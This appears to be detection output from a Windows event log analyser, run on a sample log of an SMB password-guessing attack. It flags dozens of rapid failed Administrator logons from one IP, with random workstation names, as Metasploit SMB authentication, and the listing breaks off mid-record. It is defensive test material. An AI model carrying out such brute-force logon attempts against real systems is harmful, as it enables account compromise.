SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: 
